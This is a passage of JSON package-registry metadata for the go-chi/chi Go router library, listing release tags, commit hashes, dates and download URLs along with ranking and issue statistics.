ublished_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.243Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":10.394530434584915,"dependent_packages_count":8.423428357662951,"stargazers_count":0.4861221465734116,"forks_count":0.8769409785446045,"docker_downloads_count":null,"average":5.045255479341471},"purl":"pkg:golang/github.com/go-chi/%21chi","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/go-chi/Chi","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/go-chi/Chi","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/go-chi/Chi/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2FChi/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2FChi/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/